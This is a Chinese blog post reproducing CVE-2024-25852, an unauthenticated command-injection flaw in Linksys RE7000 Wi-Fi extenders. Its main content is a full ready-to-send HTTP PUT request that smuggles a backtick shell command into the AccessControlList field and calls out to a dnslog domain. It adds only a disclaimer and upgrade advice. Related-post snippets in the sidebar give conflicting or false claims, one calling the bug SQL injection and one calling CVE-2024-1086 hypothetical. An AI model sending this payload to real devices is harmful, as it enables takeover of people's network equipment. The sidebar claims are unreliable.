CVE-2024-25852 Linksys RE7000无线扩展器 RCE漏洞

于 2024-05-11 11:58:15 发布
阅读量232 收藏 2
点赞数 3
分类专栏: 漏洞复现 漏洞 文章标签: 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_70137901/article/details/138709063
版权

文章目录

免责声明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

漏洞描述

RE7000是Linksys推出的一款具有无缝漫游功能的双频AC1900无线扩展器,重点是with seamless roaming(无缝漫游)

漏洞原理

RE7000无线扩展器在访问/goform/AccessControl功能接口时在AccessControlList参数存在远程命令执行

影响版本

Linksys RE7000 v2.0.9
Linksys RE7000 v2.0.11
Linksys RE7000 v2.0.15

漏洞复现

在这里插入图片描述
抓包用PUT方法提交参数

PUT /goform/AccessControl HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 81
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Upgrade-Insecure-Requests: 1

{"AccessPolicy":"0","AccessControlList":"`ping -c 4 73003b47.dnslog.biz`"}

在这里插入图片描述
在这里插入图片描述

修复建议

更新到最新版本

抠脚大汉在网络
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linksys RE7000无线扩展器 RCE漏洞复现(CVE-2024-25852)
0xSec
04-20 662
Linksys RE7000无线扩展器在访问控制功能点的“AccessControlList”参数中存在命令执行漏洞。未经身份验证的远程攻击者可以利用该漏洞获取设备管理员权限。
漏洞复现】Linksys-RE7000无线扩展器-命令执行-AccessControl(CVE-2024-25852)
知黑而守白
05-05 57
RE7000Linksys新推出的一款具有无缝漫游功能的双频AC1900无线扩展器,重点是with seamless roaming(无缝漫游),这在家用级产品上很少出现。Linksys-RE7000无线扩展器 AccessControl 接口处存在SQL注入漏洞,恶意攻击者可能会利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失。
漏洞复现】Linksys RE7000无线扩展器 命令注入漏洞(CVE-2024-25852)
qq_67810151的博客
04-22 217
Linksys RE7000无线扩展器存在命令注入漏洞,未授权的攻击者可以通过该漏洞执行任意命令,控制服务器。
Linksys RE7000 “AccessControlList ”命令执行漏洞(CVE-2024-25852 )
wan___she__pi的博客
04-25 538
Linksys RE7000 是由 Linksys 公司生产的一款 Wi-Fi 信号扩展器Linksys 是一家知名的网络设备制造商。RE7000 的设计目的是增强和扩展现有 Wi-Fi 网络的覆盖范围,帮助消除无信号区域,并改善信号薄弱的区域的连接质量。Linksys RE7000 v2.0.9、2.0.11和v 2.0.15在访问控制功能点的“AccessControlList”参数中存在命令执行漏洞
应用软件漏洞利用分布
securitypaper的博客
10-27 672
Adobe 公司在 2005 年收购 Flash,并大力推广应用使其一度是漏洞挖掘人员的研究焦点,根据图 3.4 的历史数据可以看到,2015 和 2016 年爆出的漏洞总数占据整体数量的 55.09%。在 Hacking Team 泄 露 CVE-2015-5122 和 CVE-2015-5199 这两个 0day 漏洞之后,更是给漏洞利用带来了通用的模板 1,但 之后随着 Adobe 引入了隔离堆、Vector 长度检测、CFG保护等安全机制,Flash 漏洞利用的门槛被加 大了很多。 图 3.4 FL
exploit (Linux 内核CVE-2024-1086漏洞复现脚本)
06-06
Linux 内核CVE-2024-1086漏洞复现脚本。 在普通用户下,将文件上传后,chmod 777 exploit ,然后运行 ./exploit ,提权成功,输入id,可看到已经是root权限 。
tomcat 升级到8.5.99后,系统启动不起来问题(修复 CVE-2024-24549 拒绝访问漏洞
04-16
在8.5.98基础上,增加了修复 CVE-2024-24549 漏洞代码
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http:
Python学习笔记16 - 猜数字小游戏
06-25
猜数字小游戏的相关函数,与主程序搭配使用
机器人比赛内容的讲解,帮助简单了解一下机器人比赛的注意事项
06-25
适用于未参加过机器人比赛的小伙伴,简单了解一下注意事项。
shumaguan.rar
最新发布
06-25
shumaguan.rar
信捷MP3系列步进电机CAD图纸.zip
06-25
信捷MP3系列步进电机CAD图纸
基于Springboot的足球青训俱乐部管理系统(免费提供全套java开源毕业设计源码+数据库+开题报告+论文+ppt+使用说明
06-25
随着社会经济的快速发展,人们对足球俱乐部的需求日益增加,加快了足球健身俱乐部的发展,足球俱乐部管理工作日益繁忙,传统的管理方式已经无法满足足球俱乐部管理需求,因此,为了提高足球俱乐部管理效率,足球俱乐部管理后台系统应运而生。 本文重点阐述了足球青训俱乐部管理后台系统的开发过程,以实际运用为开发背景,基于Spring Boot框架,运用了Java技术和MYSQL数据库进行开发设计,充分保证系统的安全性和稳定性。本系统界面良好,操作简单方便,通过系统概述、系统分析、系统设计、数据库设计、系统测试这几个部分,详细的说明了系统的开发过程,最后并对整个开发过程进行了总结,实现了俱乐部相关信息管理的重要功能。 本系统经过测试,运行效果稳定,操作方便、快捷,是一个功能全面、实用性好、安全性高,并具有良好的可扩展性、可维护性的足球青训俱乐部管理后台系统。 关键字:俱乐部管理;Spring Boot框架;Java技术;MYSQL数据库
QT拖放事件六:自定义MIME类型的存储及读取demo
06-25
QT拖放事件六:自定义MIME类型的存储及读取demo
基于SSM++jsp的汽车配件销售业绩管理系统(免费提供全套java开源毕业设计源码+数据库+开题报告+论文+ppt+使用说明)
06-25
如今的信息时代,对信息的共享性,信息的流通性有着较高要求,因此传统管理方式就不适合。为了让亚盛汽车配件销售信息的管理模式进行升级,也为了更好的维护亚盛汽车配件销售信息,亚盛汽车配件销售业绩管理系统的开发运用就显得很有必要。并且通过开发亚盛汽车配件销售业绩管理系统,不仅可以让所学的JSP技术得到实际运用,也可以掌握MySQL的使用方法,对自身编程能力也有一个检验和提升的过程。尤其是通过实践,可以对系统的开发流程加深印象,无论是前期的分析与设计,还是后期的编码测试等环节,都可以有一个深刻的了解。 亚盛汽车配件销售业绩管理系统根据调研,确定管理员管理客户,供应商,员工,管理配件和配件的进货以及出售信息。员工只能管理配件和配件的出售以及进货信息,可以修改密码和个人信息。 借助于亚盛汽车配件销售业绩管理系统这样的工具,让信息系统化,流程化,规范化是最终的发展结果,让其遵循实际操作流程的情况下,对亚盛汽车配件销售信息实施规范化处理,让亚盛汽车配件销售信息通过电子的方式进行保存,无论是管理人员检索亚盛汽车配件销售信息,维护亚盛汽车配件销售信息都可以便利化操作,真正缩短信息处理时间,节省人力和信息管理
linux漏洞编号cve-2024-1086
06-15
CVE-2024-1086是一个尚未公开的、假设性的漏洞编号,因为2024年尚未到来,所以目前还没有官方发布的CVE-2024-1086。CVE(Common Vulnerabilities and Exposures)是用于统一标识公开的安全漏洞的标准命名系统,由...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值